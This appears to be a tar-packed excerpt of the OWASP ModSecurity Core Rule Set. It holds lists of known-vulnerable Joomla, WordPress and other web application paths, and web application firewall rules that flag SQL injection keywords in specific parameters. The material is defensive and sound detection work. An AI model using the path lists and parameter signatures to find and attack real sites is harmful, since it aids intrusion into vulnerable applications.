/admin/cms/opentree.php /admin/code/tce_xml_user_results.php /admin/config.php /admin/edit.asp /admin/memberlist.php /admin/modules/modules.php /admin_check_user.asp /admin_hacks_list.php /admincp.php /admincp/attachment.php /administration/administre2.php /administrator/components/com_sqlreport/ajax/print.php /albmgr.php /annonce_detail.php /applications/SecureLoginManager/inc_secureloginmanager.asp /aramayap.asp /archives.php /articles.asp /artreplydelete.asp /auth.php /badword.asp /banner.php /bb-includes/formatting-functions.php /bexfront.php /blocks/block-Old_Articles.php /boxx/ShowAppendix.asp /bry.asp /bt-trackback.php /bus_details.asp /calendar_detail.asp /cart.inc.php /cart.php /cat.asp /categoria.php /category.php /cats.asp /cchatbox.php /cgi-bin/reorder2.asp /check_vote.php /class/debug/debug_show.php /class/table_broken.php /classes/class.news.php /classes/class_session.php /classified_img.php /code/guestadd.php /com_comment.php /comersus_optReviewReadExec.asp /comment.php /comments.php /compareHomes.asp /compare_product.php /connexion.php /content.asp /content.php /content/rubric/index.php /country_escorts.php /coupon_detail.asp /dagent/downloadreport.asp /database/table/user.php /db_ecard.php /default.asp /default2.asp /detail.asp /detail.php /details.asp /dettaglio.asp /devami.asp /diary.php /dirSub.asp /dircat.asp /directions.php /directory.php /dispimage.asp /displayCalendar.asp /display_review.php /displaypic.asp /dl.php /dlwallpaper.php /down.asp /down_indir.asp /download_image.asp /dsp_page.cfm /duyuru.asp /eWebQuiz.asp /edit.asp /edit_day.php /email.php /error.asp /etkinlikbak.asp /example.php /faq.php /faqDsp.asp /filecheck.php /filelist.asp /filemgmt/singlefile.php /forgotpass.asp /forum.asp /forum.php /forum/include/error/autherror.cfm /forum/modules/gallery/post.php /forum/pop_up_member_search.asp /forum2.asp /forums.php /friend.php /functions.php /functions/functions_filters.asp /gallery.asp /gallery.php /game.php /game_listing.php 
/getnewsitem.php /giris.asp /giris_yap.asp /glossaire-p-f.php /gmail.php /goster.asp /guestbook.php /h_goster.asp /haber.asp /haberdetay.asp /haberoku.asp /hilfsmittel.php /home.php /homeDetail.asp /html/studentmain.php /i-search.php /imprimir.php /inc/class_users.php /inc/common.php /inc_listnews.asp /include.php /includes/a_register.asp /includes/mambo.php /includes/nsbypass.php /includes/rating.php /index.asp /index.cfm /index.php /index1.asp /info_book.asp /info_user.asp /informacion_general.php /infusions/mg_user_fotoalbum_panel/mg_user_fotoalbum.php /infusions/teams_structure/team.php /inlinemod.php /inout/status.asp /inout/update.asp /install.php /interna.php /item.asp /item.php /item_list.asp /item_show.asp /ixm_ixpnews.php /journal.php /jtfwcpnt.jsp /jump.php /kategori.asp /kernel/group.php /kullanicilistesi.asp /letterman.class.php /lib/entry_reply_entry.php /links.php /linkslist.asp /lire-avis.php /list.asp /list.php /list_comments.php /listfull.asp /listings.asp /listmain.asp /listmembers.php /listpics.asp /login.asp /login.php /login/register.asp /logon_user.php /low.php /mailer.w2b /main.asp /main/auth/my_progress.php /main_page.php /mainfile.php /manufacturer.php /meal_rest.asp /members.asp /mesajkutum.asp /mezungiris.asp /minbrowse.php /mod.php /mod_banners.php /model-kits.php /models/category.php /modules.php /modules/Advertising/admin/index.php /modules/News/index.php /modules/Surveys/modules.php /modules/admin/modules/gallery.php /modules/bms/invoices_discount_ajax.php /modules/comments/json.php /modules/mod_mainmenu/menu.php /moscomment.php /mystats.php /navigacija.php /news.asp /news.php /news_detail.asp /news_page.asp /newsdetail.asp /newsletters/edition.php /nickpage.php /notaevento.php /nukesentinel.php /ogretmenkontrol.asp /oku.asp /openPolicy.asp /open_tree.php /openlink.asp /orange.asp /order-track.php /ossim/repository/repository_attachment.php /outputs.php /page.asp /page.php /pages/addcomment2.php /pfs/pfs.edit.inc.php 
/philboard_forum.asp /phonemessage.asp /php-stats.recphp.php /plugins/authentication/ldap.php /plugins/campsiteattachment/attachments.php /plugins/ipsearch/ipsearch.admin.php /plugins/mp3playlist/mp3playlist.php /plugins/pdfClasses/pdfgen.php /plugins/search/categories.php /plugins/search/contacts.php /plugins/search/content.php /plugins/search/sections.php /plugins/search/weblinks.php /plugins/user/example.php /plus/feedback_js.php /pms.php /pollmentorres.asp /polls.php /pop_profile.asp /post.php /postingdetails.php /preferences.asp /prikazInformacije.php /print.asp /print.php /printarticle.asp /printmain.asp /printview.php /process.php /prodList.asp /product.asp /product_review.php /productdetail.asp /products.asp /products.php /program/moduler_banner_aabn.php /public/code/cp_downloads.php /public/code/cp_menu_data_file.php /publication_view.asp /publications_list.asp /qte_result.php /question.php /rating.asp /read/index.php /recipe.php /refund_request.php /register.php /repass.php /res_details.asp /result.asp /result.php /roleManager.jsp /rss.asp /rss/show_webfeed.php /samples/with_db/loaddetails.php /save.php /search.asp /search.php /search_listing.asp /searchkey.asp /searchmain.asp /searchoption.asp /section/default.asp /send_password_preferences.asp /sendarticle.asp /set_preferences.asp /shared/code/cp_authorization.php /shared/code/cp_functions_downloads.php /shopgiftregsearch.asp /show_joined.php /show_news.php /show_owned.php /showcats.php /showfile.asp /simplog/archive.php /simplog/index.php /site_info.php /slideshow.asp /sptrees/default.aspx /style.php /stylesheet.php /subcat.php /system/core/users/users.register.inc.php /system/index.php /takefreestart.php /tde_busca/processaPesquisa.php /templates/modif.html /thread.php /thumbnails.asp /thumbnails.php /topic_title.php /torrents.php /tracking/courseLog.php /types.asp /update_profile.php /urunbak.asp /user.asp /user.php /user_confirm.asp /user_pages/page.asp /userdetail.php /usergroups.php /usermgr.php 
/users.php /utilities/usermessages.asp /uye_giris_islem.asp /vBSupport.php /vdateUsr.asp /vehiclelistings.asp /verify.php /vf_memberdetail.asp /view.php /view_gallery.asp /view_profile.php /view_recent.asp /viewad.asp /viewcat.php /viewimage.php /viewlinks.asp /viewthread.php /virtuemart_parser.php /visu_user.asp /voirannonce.php /wallpaper.php /wbsearch.aspx /web/classes/autocomplete.php /windows.asp /wp-admin/admin-ajax.php /wp-admin/admin-functions.php /wp-content/plugins/1-flash-gallery/massedit_album.php /wp-content/plugins/cpl/cplphoto.php /wp-content/plugins/flash-album-gallery/lib/hitcounter.php /wp-content/plugins/forum-server/feed.php /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php /wp-trackback.php /xNews.php /xmlrpc.php graph_view.php tree.php����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_wordpress.data�������������0000664�0000000�0000000�00000003301�12164572564�0031726�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/books/getConfig.php /js/modalbox/tests/functional/_ajax_method_get.php /js/wptable-button.php /js/wptable-tinymce.php /plugins/accept-signups/accept-signups_submit.php /plugins/feedlist/handler_image.php /plugins/inline-gallery/browser/browser.php /plugins/socialgrid/static/js/inline-admin.js.php /rss/show_webfeed.php /sidebar.php /wordtube-button.php /wp-admin/admin-ajax.php /wp-admin/admin-functions.php 
/wp-admin/admin.php /wp-content/plugins/1-flash-gallery/folder.php /wp-content/plugins/1-flash-gallery/massedit_album.php /wp-content/plugins/audio/getid3/demos/demo.browse.php /wp-content/plugins/cpl/cplphoto.php /wp-content/plugins/firestats/php/window-add-excluded-ip.php /wp-content/plugins/firestats/php/window-add-excluded-url.php /wp-content/plugins/firestats/php/window-new-edit-site.php /wp-content/plugins/flash-album-gallery/lib/hitcounter.php /wp-content/plugins/forum-server/feed.php /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php /wp-content/plugins/jquery-mega-menu/skin.php /wp-content/plugins/lazyest-gallery/lazyest-popup.php /wp-content/plugins/nextgen-gallery/xml/media-rss.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/ungallery/source_vuln.php /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php /wp-content/plugins/wp-cumulus/tagcloud.swf /wp-content/plugins/wp-publication-archive/includes/openfile.php /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php /wp-content/plugins/xcloner-backup-and-restore/cloner.cron.php /wp-content/plugins/xcloner-backup-and-restore/index2.php /wp-content/plugins/zotpress/zotpress.image.php /wp-login.php /wp-trackback.php /xmlrpc.php page=eshop-orders.php 
page=eshop-templates.php�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_46_slr_et_xss.data�������������������0000664�0000000�0000000�00000011614�12164572564�0030521�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/Aris/wflogin.jsp /Default.aspx /English_manual_version_2.php /Forms/home_1 /ReadMsg.php /ReqWebHelp/advanced/workingSet.jsp /ReqWebHelp/basic/searchView.jsp /SearchCenter/Pages/AllResults.aspx /WebEditor/Authentication/LoginPage.aspx /WorkArea/reterror.aspx /_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php /action_create/index.php /addons/kcfinder/browse.php /addressbook.cgi /admin/editListing.php /admin/queuedMessage.do /admin/rp-menu.php /admin/upgrade_unattended.php /administrator/components/com_xcloner-backupandrestore/index2.php /all_photos.html /annonce.php /appdev/sample/web/hello.jsp /archiva/admin/addLegacyArtifactPath!commit.action /archiva/admin/confirmDeleteRepository.action /archiva/admin/deleteNetworkProxy!confirm.action /archiva/deleteArtifact!doDelete.action /archiva/security/roleedit.action /archiva/security/useredit.action /archiva/security/userlist!show.action /awards.php /awstats/awstats.pl /basicstats.php /bizdir/bizdir.cgi /browseCat.php /browseSubCat.php /cacti/utilities.php /calendar.php /cand_login.asp /cat.php /catalogo.php /cgi/surgeftpmgr.cgi /config/edituser.php /configure_plugin.tpl.php 
/console.php /contact/index.php /core/themes.php /cultbooking.php /dailyview.php /de/create_account.asp /de/pda/dev_logon.asp /devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php /en/front_content.php /explanation.php /faces/jsf/tips.jsp /fetchmailprefs.php /footer.php /forcerestart.php /forcesd.php /frontend/x3/files/fileop.html /gnatsweb.pl /header.php /hlstats.php /html/11-login.asp /html/studentmain.php /implicit-objects.jsp /include/sessionRegister.php /index.php /js/modalbox/tests/functional/_ajax_method_get.php /jscripts/folder_rte_files/module_table.php /lib/jscalendar/test.php /lib/spikephpcoverage/src/phpcoverage.remote.top.inc.php /listmembers.php /listmovies.php /loan.php /login.php /main/inc/lib/fckeditor/editor/plugins/ImageManager/editor.php /mods/ckeditor/filemanager/connectors/php/upload.php /module_bbcodeloader.php /module_div.php /module_email.php /module_image.php /module_link.php /modules.php /modules/boonex/custom_rss/post_mod_crss.php /modules/dl/download.php /news.asp /news.php /news/list/index.php /news/search.php3 /newsletter/create/index.php /openBrowser.php /openTutorial.php /order_form.php /patch/single_winner1.php /picture.php /plugins/accept-signups/accept-signups_submit.php /plugins/csstidy/css_optimiser.php /plugins/feedlist/handler_image.php /plugins/inline-gallery/browser/browser.php /plugins/photosmash-galleries/index.php /plugins/socialgrid/static/js/inline-admin.js.php /printcal.pl /private/blade_leds.php /private/cindefn.php /private/ipmi_bladestatus.php /private/pm_temp.php /private/power_management_policy_options.php /private/power_module.php /profiles/html/simpleSearch.do /rating/postcomments.php /rating/rate.php /register.php /reportItem.do /room/info_book.asp /room/week.asp /scripts/prodList.asp /search.5.html /search.php /search/list/action_search/index.php /sendcard.php /sendmail.php /sessions /settings.php /shared/code/cp_authorization.php /shared/config/cp_config.php 
/shipping/methods/fedex_v7/label_mgr/js_include.php /shipping/pages/popup_shipping/js_include.php /shopcontent.asp /showown.php /sidebar.php /siteminderagent/forms/smpwservices.fcc /skins/header.php /snarf_ajax.php /sqledit.php /stats.php /tagcloud-ru.swf /tagcloud.swf /templates/admin_default/confirm.tpl.php /templates/recruitment/jobVacancy.php /tiki-featured_link.php /topFrame.php /user/User_ChkLogin.asp /users/payment.php /usersettings.php /usrmgr/registerAccount.asp /vBTube.php /verify/asp/n6plugindestructor.asp /vtigerservice.php /we/include/weTracking/econda/weEcondaImplement.inc.php /we/include/we_modules/messaging/messaging_show_folder_content.php /we/include/we_modules/shop/edit_shop_editorFrameset.php /weapons.php /web/msgList/viewmsg/actions/msgAnalyse.asp /web/msgList/viewmsg/actions/msgForwardToRiskFilter.asp /web/msgList/viewmsg/viewHeaders.asp /web/phpinfo.php /workarea/medialist.aspx /wp-content/plugins/1-flash-gallery/folder.php /wp-content/plugins/audio/getid3/demos/demo.browse.php /wp-content/plugins/firestats/php/window-add-excluded-ip.php /wp-content/plugins/firestats/php/window-add-excluded-url.php /wp-content/plugins/firestats/php/window-new-edit-site.php /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php /wp-content/plugins/lazyest-gallery/lazyest-popup.php /wp-content/plugins/nextgen-gallery/xml/media-rss.php /wp-content/plugins/php_speedy_wp/libs/php_speedy/view/admin_container.php /wp-content/plugins/vodpod-video-gallery/vodpod_gallery_thumbs.php /wp-content/plugins/wp-cumulus/tagcloud.swf /wp-content/plugins/wp-safe-search/wp-safe-search-jx.php /wp-content/plugins/xcloner-backup-and-restore/index2.php /wp-content/plugins/zotpress/zotpress.image.php /wp-content/themes/redoable/header.php /wp-content/themes/redoable/searchloop.php /xperience.php /zimplit.php _invoice.asp page=eshop-orders.php page=eshop-templates.php 
stconf.nsf��������������������������������������������������������������������������������������������������������������������SpiderLabs-owasp-modsecurity-crs-0f07cbb/slr_rules/modsecurity_crs_46_slr_et_joomla_attacks.conf����0000664�0000000�0000000�00000731314�12164572564�0033570�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# --------------------------------------------------------------- # Core ModSecurity Rule Set ver.2.2.8 # Copyright (C) 2006-2012 Trustwave All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENCE file for full details. # --------------------------------------------------------------- # # This ruleset was created by Trustwave SpiderLabs Research Team and includes data from: # # http://www.emergingthreats.net/ # SecRule REQUEST_FILENAME "!@pmFromFile modsecurity_46_slr_et_joomla.data" "id:'2000000',phase:2,nolog,pass,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,skipAfter:END_SLR_ET_JOOMLA_RULES" # (2005292) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid SELECT SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005292,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- category.php catid SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005293) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UNION SELECT SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005293,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005294) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid INSERT SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005294,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'" SecRule ARGS:catid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005295) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- category.php catid DELETE
# Review notes for rules 2005295-2005301 (Joomla! category.php and
# letterman.class.php SQL injection signatures):
# - Each signature is a two-link chain. The starter matches the script name as
#   a substring of REQUEST_LINE, so it also fires when that string appears in
#   the query string rather than in the path.
# - The second link applies a case-insensitive keyword regex to one named
#   argument (ARGS:catid or ARGS:id). Patterns such as DELETE.+FROM match any
#   value that contains both words in that order, so expect false positives if
#   these parameters ever carry free text.
# - 'block' leaves the disruptive action to the SecDefaultAction in force.
#   Every match also adds tx.critical_anomaly_score to tx.anomaly_score, sets
#   tx.msg and adds audit log part E.
# - NOTE(review): the t: actions are listed only on the chain starter; confirm
#   which transformations the second link runs with in your deployment.
SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005295,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule ARGS:catid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005296) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid ASCII
SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005296,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule ARGS:catid "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005297) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE
SecRule REQUEST_LINE "@contains /models/category.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005297,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule ARGS:catid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- category.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005298) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id SELECT
SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005298,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'"
    SecRule ARGS:id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005299) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UNION SELECT
SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005299,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'"
    SecRule ARGS:id "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005300) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id INSERT
SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005300,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'"
    SecRule ARGS:id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005301) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id DELETE
SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005301,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'"
    SecRule ARGS:id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005302) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! 
SQL Injection Attempt -- letterman.class.php id ASCII
# Review notes for rules 2005302-2005394 (Joomla! letterman.class.php and
# plugins/user/example.php SQL injection signatures):
# - Each signature is a two-link chain; the starter matches the script name as
#   a substring of REQUEST_LINE, which includes the query string.
# - 2005302 and 2005303 test the named argument ARGS:id. The example.php rules
#   instead test the whole QUERY_STRING and REQUEST_BODY, so a keyword pair
#   anywhere in either one satisfies the second link.
# - NOTE(review): the t: actions are listed only on the chain starter, and
#   QUERY_STRING/REQUEST_BODY are presumably still URL-encoded when the second
#   link runs; confirm the transformations in effect for it.
# - 'block' leaves the disruptive action to the SecDefaultAction in force;
#   every match adds tx.critical_anomaly_score to tx.anomaly_score.
SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005302,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'"
    SecRule ARGS:id "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005303) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE
SecRule REQUEST_LINE "@contains /letterman.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005303,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22117'"
    SecRule ARGS:id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- letterman.class.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT
SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005390,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005391) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT
SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005391,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
# (2005802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT
SecRule REQUEST_LINE "@contains /plugins/user/example.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005802,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459203/100/0/threaded'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- example.php INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"
